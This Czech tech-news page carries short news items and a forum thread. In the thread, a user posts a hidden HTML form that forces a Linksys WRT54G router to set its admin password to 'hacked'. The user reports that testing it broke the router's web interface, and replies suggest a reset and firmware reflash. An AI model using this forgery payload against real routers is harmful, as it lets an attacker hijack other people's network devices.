Byla vydána (𝕏) nová verze 24.7 open source firewallové a routovací platformy OPNsense (Wikipedie). Jedná se o fork pfSense postavený na FreeBSD. Kódový název OPNsense 24.7 je Thriving Tiger. Přehled novinek v příspěvku na fóru.
Binarly REsearch upozorňuje na bezpečnostní problém PKFail (YouTube) v ekosystému UEFI. Stovky modelů zařízení používají pro Secure Boot testovací Platform Key vygenerovaný American Megatrends International (AMI) a jeho privátní část byla při úniku dat prozrazena. Do milionů zařízení (seznam v pdf) po celém světě tak útočníci mohou do Secure Bootu vložit podepsaný malware. Otestovat firmware si lze na stránce pk.fail. Ukázka PoC na Linuxu na Windows na YouTube.
Mobilní operační systém /e/OS (Wikipedie) založený na Androidu / LineageOS, ale bez aplikací a služeb od Googlu, byl vydán ve verzi 2.2 (Mastodon, 𝕏). Přehled novinek na GitLabu. Vypíchnuta je rodičovská kontrola.
Společnost OpenAI představila vyhledávač SearchGPT propojující OpenAI modely umělé inteligence a informace z webů v reálném čase. Zatím jako prototyp pro vybrané uživatele. Zapsat se lze do pořadníku čekatelů.
Distribuce Linux Mint 22 „Wilma“ byla vydána. Je založená na Ubuntu 24.04 LTS, ale s desktopovým prostředím Cinnamon (aktuálně verze 6.2), příp. MATE nebo Xfce, balíkem aplikací XApp, integrací balíčků Flatpak a dalšími změnami. Více v přehledu novinek a poznámkách k vydání.
Příspěvek na blogu Truffle Security: Kdokoli může přistupovat ke smazaným a privátním repozitářům na GitHubu.
Byla vydána nová verze 14 integrovaného vývojového prostředí (IDE) Qt Creator. Podrobný přehled novinek v cgitu. Vypíchnout lze podporu rozšíření v Lua.
Byla vydána verze 1.80.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Apple oznámil, že v beta verzi spustil své Apple Maps na webu. Podporován je také webový prohlížeč Chrome. Ne však na Linuxu.
Portál Stack Overflow po roce opět vyzpovídal své uživatele, jedná se především o vývojáře softwaru, a zveřejnil detailní výsledky průzkumu. Průzkumu se letos zúčastnilo více než 65 tisíc vývojářů. Z Česka jich bylo 710. Ze Slovenska 246.
<\form method="post" action="http://192.168.2.1/manage.tri">
<\input type="hidden" name="remote_mgt_https" value="0">
<\input type="hidden" name="http_enable" value="1">
<\input type="hidden" name="https_enable" value="0">
<\input type="hidden" name="PasswdModify" value="1">
<\input type="hidden" name="http_passwd" value="hacked">
<\input type="hidden" name="http_passwdConfirm" value="hacked">
<\input type="hidden" name="_http_enable" value="1">
<\input type="hidden" name="web_wl_filter" value="1">
<\input type="hidden" name="remote_management" value="0">
<\input type="hidden" name="upnp_enable" value="1">
<\input type="hidden" name="layout" value="en">
<\input type="submit">
<\/form>
Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.
Řešení dotazu:
Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4"
Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.
Ja ("nastesti" - ono jak kdy ), primo do internetu pripojen nejsem. Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit
).
Tiskni
Sdílej: